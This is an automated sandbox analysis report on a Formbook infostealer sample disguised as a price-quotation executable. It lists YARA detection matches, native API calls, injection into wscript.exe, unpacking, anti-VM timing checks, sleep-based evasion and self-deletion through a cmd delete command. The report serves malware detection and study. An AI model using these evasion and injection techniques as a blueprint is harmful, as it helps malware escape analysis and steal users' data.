Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040312A
Detected potential crypto function
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_00406354 0_2_00406354
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_00404802 0_2_00404802
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_00406B2B 0_2_00406B2B
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_7333AA17 0_2_7333AA17
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_7333AA08 0_2_7333AA08
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00401027 3_2_00401027
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00401030 3_2_00401030
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041C966 3_2_0041C966
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041B931 3_2_0041B931
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00401208 3_2_00401208
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041BB7C 3_2_0041BB7C
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041CBD9 3_2_0041CBD9
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00408C8B 3_2_00408C8B
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00408C90 3_2_00408C90
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041C5D1 3_2_0041C5D1
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00402D90 3_2_00402D90
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041A6B6 3_2_0041A6B6
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00402FB0 3_2_00402FB0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009EB090 3_2_009EB090
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A91002 3_2_00A91002
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009DF900 3_2_009DF900
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009F4120 3_2_009F4120
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6B090 17_2_04C6B090
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11002 17_2_04D11002
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6841F 17_2_04C6841F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6D5E0 17_2_04C6D5E0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D21D55 17_2_04D21D55
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5F900 17_2_04C5F900
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C50D20 17_2_04C50D20
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C74120 17_2_04C74120
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C76E30 17_2_04C76E30
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8EBB0 17_2_04C8EBB0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B4B931 17_2_00B4B931
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B4C966 17_2_00B4C966
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B4CBD9 17_2_00B4CBD9
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B4BB7C 17_2_00B4BB7C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B38C90 17_2_00B38C90
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B38C8B 17_2_00B38C8B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B32D90 17_2_00B32D90
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B4A6B6 17_2_00B4A6B6
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B32FB0 17_2_00B32FB0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 04C5B150 appears 32 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_004185D0 NtCreateFile, 3_2_004185D0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00418680 NtReadFile, 3_2_00418680
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00418700 NtClose, 3_2_00418700
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_004187B0 NtAllocateVirtualMemory, 3_2_004187B0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_004185CB NtCreateFile, 3_2_004185CB
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041867A NtReadFile, 3_2_0041867A
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_004186FB NtClose, 3_2_004186FB
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041872A NtClose, 3_2_0041872A
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_004187AA NtAllocateVirtualMemory, 3_2_004187AA
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A198F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_00A198F0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A19860 NtQuerySystemInformation,LdrInitializeThunk, 3_2_00A19860
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A19840 NtDelayExecution,LdrInitializeThunk, 3_2_00A19840
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A199A0 NtCreateSection,LdrInitializeThunk, 3_2_00A199A0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A19910 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_00A19910
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A19A20 NtResumeThread,LdrInitializeThunk, 3_2_00A19A20
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A19A00 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_00A19A00
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A19A50 NtCreateFile,LdrInitializeThunk, 3_2_00A19A50
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A195D0 NtClose,LdrInitializeThunk, 3_2_00A195D0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A19540 NtReadFile,LdrInitializeThunk, 3_2_00A19540
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A196E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_00A196E0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A19660 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_00A19660
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A197A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_00A197A0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A19780 NtMapViewOfSection,LdrInitializeThunk, 3_2_00A19780
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A19FE0 NtCreateMutant,LdrInitializeThunk, 3_2_00A19FE0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A19710 NtQueryInformationToken,LdrInitializeThunk, 3_2_00A19710
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A198A0 NtWriteVirtualMemory, 3_2_00A198A0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A19820 NtEnumerateKey, 3_2_00A19820
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A1B040 NtSuspendThread, 3_2_00A1B040
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A199D0 NtCreateProcessEx, 3_2_00A199D0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A19950 NtQueueApcThread, 3_2_00A19950
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99840 NtDelayExecution,LdrInitializeThunk, 17_2_04C99840
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99860 NtQuerySystemInformation,LdrInitializeThunk, 17_2_04C99860
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C995D0 NtClose,LdrInitializeThunk, 17_2_04C995D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C999A0 NtCreateSection,LdrInitializeThunk, 17_2_04C999A0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99540 NtReadFile,LdrInitializeThunk, 17_2_04C99540
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99910 NtAdjustPrivilegesToken,LdrInitializeThunk, 17_2_04C99910
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C996D0 NtCreateKey,LdrInitializeThunk, 17_2_04C996D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C996E0 NtFreeVirtualMemory,LdrInitializeThunk, 17_2_04C996E0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99A50 NtCreateFile,LdrInitializeThunk, 17_2_04C99A50
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99650 NtQueryValueKey,LdrInitializeThunk, 17_2_04C99650
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99660 NtAllocateVirtualMemory,LdrInitializeThunk, 17_2_04C99660
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99FE0 NtCreateMutant,LdrInitializeThunk, 17_2_04C99FE0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99780 NtMapViewOfSection,LdrInitializeThunk, 17_2_04C99780
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99710 NtQueryInformationToken,LdrInitializeThunk, 17_2_04C99710
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C998F0 NtReadVirtualMemory, 17_2_04C998F0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C998A0 NtWriteVirtualMemory, 17_2_04C998A0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C9B040 NtSuspendThread, 17_2_04C9B040
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99820 NtEnumerateKey, 17_2_04C99820
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C999D0 NtCreateProcessEx, 17_2_04C999D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C995F0 NtQueryInformationFile, 17_2_04C995F0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99950 NtQueueApcThread, 17_2_04C99950
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99560 NtWriteFile, 17_2_04C99560
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99520 NtWaitForSingleObject, 17_2_04C99520
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C9AD30 NtSetContextThread, 17_2_04C9AD30
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99A80 NtOpenDirectoryObject, 17_2_04C99A80
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99670 NtQueryInformationProcess, 17_2_04C99670
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99A00 NtProtectVirtualMemory, 17_2_04C99A00
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99610 NtEnumerateValueKey, 17_2_04C99610
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99A10 NtQuerySection, 17_2_04C99A10
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99A20 NtResumeThread, 17_2_04C99A20
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C997A0 NtUnmapViewOfSection, 17_2_04C997A0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C9A3B0 NtGetContextThread, 17_2_04C9A3B0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99760 NtOpenProcess, 17_2_04C99760
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99770 NtSetInformationFile, 17_2_04C99770
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C9A770 NtOpenThread, 17_2_04C9A770
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99B00 NtSetValueKey, 17_2_04C99B00
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C9A710 NtOpenProcessToken, 17_2_04C9A710
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99730 NtQueryVirtualMemory, 17_2_04C99730
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B485D0 NtCreateFile, 17_2_00B485D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B48680 NtReadFile, 17_2_00B48680
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B487B0 NtAllocateVirtualMemory, 17_2_00B487B0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B48700 NtClose, 17_2_00B48700
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B485CB NtCreateFile, 17_2_00B485CB
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B486FB NtClose, 17_2_00B486FB
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B4867A NtReadFile, 17_2_00B4867A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B487AA NtAllocateVirtualMemory, 17_2_00B487AA
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B4872A NtClose, 17_2_00B4872A
Sample file is different than original file name gathered from version info
Source: PRICE_REQUEST_QUOTATION.exe, 00000000.00000003.269417802.000000000EABF000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PRICE_REQUEST_QUOTATION.exe
Source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.341516961.0000000000C5F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PRICE_REQUEST_QUOTATION.exe
Source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.340904914.0000000000719000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs PRICE_REQUEST_QUOTATION.exe
Source: PRICE_REQUEST_QUOTATION.exe Virustotal: Detection: 34%
Source: PRICE_REQUEST_QUOTATION.exe ReversingLabs: Detection: 28%
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe File read: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe
Source: PRICE_REQUEST_QUOTATION.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Process created: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe File created: C:\Users\user\AppData\Local\Temp\nsn8CC7.tmp
Source: classification engine Classification label: mal100.troj.evad.winEXE@8/2@9/5
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar, 0_2_00402053
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_004042C1
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:496:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Binary string: wscript.pdbGCTL source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.340904914.0000000000719000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: PRICE_REQUEST_QUOTATION.exe, 00000000.00000003.270120723.000000000E9A0000.00000004.00000001.sdmp, PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, wscript.exe, 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: PRICE_REQUEST_QUOTATION.exe, wscript.exe
Source: Binary string: wscript.pdb source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.340904914.0000000000719000.00000004.00000020.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Unpacked PE file: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041B87C push eax; ret 3_2_0041B882
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041B812 push eax; ret 3_2_0041B818
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041B81B push eax; ret 3_2_0041B882
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041603B push eax; ret 3_2_0041603C
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041B148 pushad ; ret 3_2_0041B14B
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_004152B0 pushad ; retf 3_2_004152B8
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_004105D2 push ebp; ret 3_2_004105D3
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_004156A7 push ss; ret 3_2_004156AA
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041B7C5 push eax; ret 3_2_0041B818
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A2D0D1 push ecx; ret 3_2_00A2D0E4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CAD0D1 push ecx; ret 17_2_04CAD0E4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B4603B push eax; ret 17_2_00B4603C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B4B812 push eax; ret 17_2_00B4B818
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B4B81B push eax; ret 17_2_00B4B882
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B4B87C push eax; ret 17_2_00B4B882
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B4B148 pushad ; ret 17_2_00B4B14B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B452B0 pushad ; retf 17_2_00B452B8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B405D2 push ebp; ret 17_2_00B405D3
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B456A7 push ss; ret 17_2_00B456AA
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B4B7C5 push eax; ret 17_2_00B4B818

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe File created: C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Windows\SysWOW64\wscript.exe Process created: /c del 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 0000000000B38614 second address: 0000000000B3861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 0000000000B389AE second address: 0000000000B389B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 2244 Thread sleep time: -45000s >= -30000s
Source: C:\Windows\SysWOW64\wscript.exe TID: 5540 Thread sleep time: -34000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\wscript.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_004088E0 rdtsc 3_2_004088E0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_00405EC2 FindFirstFileA,FindClose, 0_2_00405EC2
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_004054EC
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_00402671 FindFirstFileA, 0_2_00402671
Source: explorer.exe, 00000006.00000000.304126686.000000000DD44000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.66
Source: explorer.exe, 00000006.00000000.286630230.000000000891C000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.313086176.000000000374F000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000006.00000000.276302180.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
